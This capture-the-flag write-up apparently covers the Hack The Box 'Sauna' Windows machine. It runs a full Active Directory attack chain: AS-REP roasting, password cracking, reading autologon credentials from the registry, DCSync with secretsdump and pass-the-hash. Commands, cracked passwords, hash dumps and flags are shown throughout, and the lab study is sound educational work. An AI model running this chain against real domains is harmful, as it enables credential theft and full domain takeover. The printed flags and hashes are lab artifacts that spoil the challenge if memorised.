TL;DR
- Create a wordlist of usernames from the information on the website
- ASRepRoasting. Ask for TGT and break the password with JohnTheRipper
- Find Autologin’s service account
- Simulate the behavior of a Domain Controller (DCSync) to retrieve Administrator’s password
- Pass the hash to get Administrator account
User.txt
Reconnaissance
Let’s start by a Nmap scan:
magnussen@funcMyLife:~/sauna$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN sauna.txt 10.10.10.175
Nmap scan report for sauna.htb (10.10.10.175)
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2020-03-28 17:20:54 CET for 268s
Not shown: 65520 filtered ports
Reason: 65520 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-03-28 23:25:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56267/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
64432/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35558/tcp): CLEAN (Timeout)
| Check 2 (port 64287/tcp): CLEAN (Timeout)
| Check 3 (port 58329/udp): CLEAN (Timeout)
| Check 4 (port 57297/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-29 00:26:02
|_ start_date: 1601-01-01 00:09:21
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 17:25:22 2020 -- 1 IP address (1 host up) scanned in 269.24 seconds
So we find some useful services:
- DNS (53)
- IIS (80)
- Kerberos (88)
- RPC (135, 593)
- Samba (138, 445)
- LDAP (389, 636, 3269)
We also find the domain: EGOTISTICAL-BANK.LOCAL
Let’s start by visiting the website:
The website is pretty empty, but we find an interesting page where the team members are listed.
User enumeration (think like an admin)
We know there is an Active Directory with Kerberos.
One common technique on Kerberos is to search for user that have the property ‘Do not require Kerberos preauthentication’ set.
When the option ‘Do not require Kerberos preauthentication’ is set, the KDC will send a TGT without requiring an authenticator (username/timestamp ciphered by the client session key). It will use the user NTLM hash to cipher the session key. We’ll be able to break it with JohnTheRipper.
Previously we found a probable list of users, but the format is Firstname Lastname which is rarely used as identifier in an Active Directory.
The three most used identifier formats are (they can be separated by a dot or an hyphen):
- Firstname Lastname (Example: JohnDoe)
- First Letter of the Firstname Lastname (Example: JDoe)
- Three First Letters of the Firstname and Three First Letter of the Lastname (Example: JohDoe)
We generate the following wordlist:
fergussmith
fergus.smith
fergus-smith
FERGUSSMITH
FERGUS.SMITH
FERGUS-SMITH
FergusSmith
Fergus.Smith
Fergus-Smith
fsmith
f.smith
f-smith
FSMITH
F.SMITH
F-SMITH
FSmith
F.Smith
F-Smith
fersmi
fer.smi
fer-smi
FERSMI
FER.SMI
FER-SMI
FerSmi
Fer.Smi
Fer-Smi
hugobear
hugo.bear
hugo-bear
HUGOBEAR
HUGO.BEAR
HUGO-BEAR
HugoBear
Hugo.Bear
Hugo-Bear
hbear
h.bear
h-bear
HBEAR
H.BEAR
H-BEAR
HBear
H.Bear
H-Bear
hugbea
hug.bea
hug-bea
HUGBEA
HUG.BEA
HUG-BEA
HugBea
Hug.Bea
Hug-Bea
stevenkerb
steven.kerb
steven-kerb
STEVENKERB
STEVEN.KERB
STEVEN-KERB
StevenKerb
Steven.Kerb
Steven-Kerb
skerb
s.kerb
s-kerb
SKERB
S.KERB
S-KERB
SKerb
S.Kerb
S-Kerb
steker
ste.ker
ste-ker
STEKER
STE.KER
STE-KER
SteKer
Ste.Ker
Ste-Ker
shauncoins
shaun.coins
shaun-coins
SHAUNCOINS
SHAUN.COINS
SHAUN-COINS
ShaunCoins
Shaun.Coins
Shaun-Coins
scoins
s.coins
s-coins
SCOINS
S.COINS
S-COINS
SCoins
S.Coins
S-Coins
shacoi
sha.coi
sha-coi
SHACOI
SHA.COI
SHA-COI
ShaCoi
Sha.Coi
Sha-Coi
bowietaylor
bowie.taylor
bowie-taylor
BOWIETAYLOR
BOWIE.TAYLOR
BOWIE-TAYLOR
BowieTaylor
Bowie.Taylor
Bowie-Taylor
btaylor
b.taylor
b-taylor
BTAYLOR
B.TAYLOR
B-TAYLOR
BTaylor
B.Taylor
B-Taylor
bowtay
bow.tay
bow-tay
BOWTAY
BOW.TAY
BOW-TAY
BowTay
Bow.Tay
Bow-Tay
sophiedriver
sophie.driver
sophie-driver
SOPHIEDRIVER
SOPHIE.DRIVER
SOPHIE-DRIVER
SophieDriver
Sophie.Driver
Sophie-Driver
sdriver
s.driver
s-driver
SDRIVER
S.DRIVER
S-DRIVER
SDriver
S.Driver
S-Driver
sopdri
sop.dri
sop-dri
SOPDRI
SOP.DRI
SOP-DRI
SopDri
Sop.Dri
Sop-Dri
AD pentesting 101: ASRepRoasting and weak password
Let’s hope that one of these accounts exists and has the ‘Do not require Kerberos preauthentication’ property set.
magnussen@funcMyLife:~/sauna$ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile wordlist.txt -format john -outputfile tgt.txt -dc-ip 10.10.10.175
It seems that the user FSmith fulfill our needs.
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:89bb00d717574d4672657e868d32e210$47e03c9263f2b670dd43b589926f52e9f4ff7115f6eb8f441326d84f0e66013db989c1b544a75d886dcebec3e86f73d412254d60fba76c0902cb74087aad6fd1ef83caf049e32c2b0d37220329542181a1b87bd2a5f18e3150da42debc463e0bb31586270d48473cddcb3578da18d147adbab0d8a398a85421312234f882bbc48abdf3eaa9c29c9a1cd321a3970e8d2670253c1131bf27c8b433486769220ec1654501f019b875296d63d0d2ebc980c781db408f51142ea8f7062d4eddd18ffe611384e86e15d4ff26a5f45920080d78929159ba4d7bec55a3981d02f0721c6158fb765a6e260d81f431a7029d4e07e4ba7f8a100998d8a4be4bd1b2334dc194
Let’s try to break the TGT with JohnTheRipper:
magnussen@funcMyLife:~/sauna$ john --wordlist=rockyou.txt tgt.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:Thestrokes23
Let’s try to connect to this account with evilwin-rm:
magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u FSmith -p Thestrokes23 -i 10.10.10.175
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
User access, done!
I AM ROOT
SeChangeNotifyPrivilege & autologin
Let’s check what are the privileges of our user:
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Nothing really interesting, except the SeChangeNotifyPrivilege that might allow us to perform directory transversal.
Even though we might not have permissions on a directory, we might be able to read files located further in the directory.
Lets see if some accounts have the Autologin feature activated.
Originally, I’ve searched for passwords in the Registry, but the output is too big to put it here, here’s the command anyway:
reg query HKLM /f password /t REG_SZ /s
*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
Pretty simple, we retrieve the account: svc_loanmanager:Moneymakestheworldgoround!
DCSync
Let’s connect to this account and gather data for BloodHound:
magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-BloodHound -CollectionMethod All -DomainController EGOTISTICAL-BANK.LOCAL -LdapUser svc_loanmgr -LdapPass Moneymakestheworldgoround! -IgnoreLdapCert
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
Directory: C:\Users\svc_loanmgr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2020 12:03 PM 9287 20200402120337_BloodHound.zip
-a---- 4/2/2020 12:01 PM 972811 SharpHound.ps1
do*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200402120337_BloodHound.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20200402120337_BloodHound.zip to 20200402120337_BloodHound.zip
Info: Download successful!
We retrieve the following graph in BloodHound.
The user svc_loanmgr has GetChangesAll and GetChanges privileges, with these permissions we’ll be able to perform an DCSync attack on this box.
We’ll use secretsdump.py from Impacket.
DCSync is a command within Mimikatz that an attacker can leverage to simulate the behavior of a Domain Controller. It allows the attacker to pretend to be a Domain Controller and ask other DC’s for user password data. We need the following permissions to perform the attack: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes In Filtered Set
magnussen@funcMyLife:~/sauna$ secretsdump.py -just-dc svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:14f2712b1fc067c07340674f336a59a1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:1fe7419bf3ddce9b30663ab860cbd2411462db6f451a9b08fee43b43d264715f
SAUNA$:aes128-cts-hmac-sha1-96:445f4b4c51415ca8dbfeca3a8c945a23
SAUNA$:des-cbc-md5:c19d13852ce3df9e
[*] Cleaning up...
Let’s do some pass the hash, we won’t even have to crack the password to connect as Administrator!
magnussen@funcMyLife:~/sauna$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
01/23/2020 04:11 PM <DIR> .
01/23/2020 04:11 PM <DIR> ..
01/23/2020 11:22 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 7,139,856,384 bytes free
C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f
This was my first Windows machine, I’ve learned a lot of things on Kerberos and Active Directory environment. I still have a lot to learn about Windows and Active Directory attacks, but it was a really great introduction!
Thanks Egotisticalsw for the box!